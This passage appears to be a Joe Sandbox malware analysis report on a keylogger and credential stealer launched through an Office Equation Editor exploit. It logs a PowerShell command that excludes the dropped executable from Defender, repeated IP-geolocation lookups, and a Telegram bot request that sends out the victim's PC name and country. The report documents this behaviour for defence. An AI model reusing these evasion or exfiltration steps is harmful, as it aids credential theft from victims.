                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20816
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzu2%2FXEdKarNe3Ag3yuUoXp%2BUshp4sH98VZ7VuSF3F2I16UJ5jHG7m1aoyGRsmeVyAE1rMcvvcbLcAgTy8MomkJZuaRkZP%2FIE5G6MskJ1t61JjDE42Z2d21Kt%2F7jWcUzDek5LXxp"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3bd38844867-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1509906&cwnd=242&unsent_bytes=0&cid=cac7cb348390c38b&ts=153&x=0"
                                                                                                          2024-10-30 07:19:53 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249168188.114.97.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:54 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:55 UTC893INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20818
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N7tPookADIuCd7sMZU%2BY9Mri%2BlCSJ%2BDvPAkmTgM41MAELXJOxr4eOtdJDQNr1q9%2ByWiTkxdxvd9P1RyPY%2Fj9J9Nruh0%2F1fFKieBBbUzALtmrCdQRAsQsPg%2FC4bqA4DoyC19IxGyU"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3c8c90628e6-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1311&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2169288&cwnd=251&unsent_bytes=0&cid=ad4be3d01843ed58&ts=152&x=0"
                                                                                                          2024-10-30 07:19:55 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249170188.114.97.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:56 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:56 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:56 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20819
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlTlr2biWBzpzYHK9PBvFNoPyeIKO0DWCAZV0PwH%2FntQgB4sz7xTUtLrZMRlwt%2BSEpuIKifTCILq75mxT7dvfuSqdkb518Qwp%2B8TlS1PMWDOpGtl9vlmqZ26Yl4XxIqkZO6zQiaC"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3d47b446b56-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1917&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1585980&cwnd=251&unsent_bytes=0&cid=ad0c81db9a2a7aa5&ts=152&x=0"
                                                                                                          2024-10-30 07:19:56 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249172188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:58 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:58 UTC884INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:58 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20821
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPauAqjzvMSea1Pn5bpAa%2B6LtRJSjvEOmISwB5bPApXJHFP7FDx7ETAxkgxfZ0xEli5pft3XsM5enouzfXSGbD2rxDNt%2FzFWncgZTlf3crFmqtJpwC20qWsr7%2Fx93XkyXqx9nure"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3ddcef24600-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=957&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2828125&cwnd=251&unsent_bytes=0&cid=81ecdb6599563a84&ts=165&x=0"
                                                                                                          2024-10-30 07:19:58 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249174188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:20:00 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:20:00 UTC891INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:00 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20823
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhdH5hApcbD4FCr5Hfx0udMefc38yNDnANIAw%2Fne82mM%2BLFRxaD%2BpvRTeGlJEHK7CRdqJ5Udgt6LQrpnTHzoQOztOxtcBxBLZI%2F8pD398PpDMfSpfKCcCJ%2BJPGipP%2FutP5Yb58Wj"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3e8cfd446de-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2477331&cwnd=246&unsent_bytes=0&cid=3b16ed40c4529d93&ts=153&x=0"
                                                                                                          2024-10-30 07:20:00 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249176188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:20:04 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:20:04 UTC889INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:04 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20827
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZvJZ2rcvv%2F5Q9j0hnlDwJzopzYsIibFe4KRvzQgxAdeqlvKrmZhi0%2B%2Bx4PZkBZTak7JZnPZOPMTpoRnWpek6YGnjp5UKLe1yAMuj4JPDs%2BDvGR44MedwJqAp%2B4WakFIXudVEqs0"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a405ccc5e702-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2211&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1332106&cwnd=251&unsent_bytes=0&cid=d4351dcde4d34a2d&ts=156&x=0"
                                                                                                          2024-10-30 07:20:04 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249179188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:20:14 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:20:15 UTC881INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20837
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GXYmSc0qtxXrrlGEYGasAQsduA0PUbJM4VIfcMRT63N6RnwhGmhwVLeIKPJcE62h1HaVKBR%2Bvb29VjQTROsDBkvDLDySkM9z8xbgqA5nBi1PnIgXp1LOIoP9HQjp6zZnEaHfTfj"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a4459bc3e863-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2086&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1352638&cwnd=236&unsent_bytes=0&cid=a5ace9a134ea10e8&ts=160&x=0"
                                                                                                          2024-10-30 07:20:15 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.2249180149.154.167.2204433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:20:15 UTC354OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:20:16 UTC344INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 30 Oct 2024 07:20:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-10-30 07:20:16 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:03:19:36
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                          Imagebase:0x13f9b0000
                                                                                                          File size:1'423'704 bytes
                                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:03:19:37
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:03:19:41
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xe80000
                                                                                                          File size:787'968 bytes
                                                                                                          MD5 hash:879B4E39A671B826E59EE54A75714CC7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 67%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:03:19:42
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xfc0000
                                                                                                          File size:427'008 bytes
                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:03:19:42
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xe80000
                                                                                                          File size:787'968 bytes
                                                                                                          MD5 hash:879B4E39A671B826E59EE54A75714CC7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
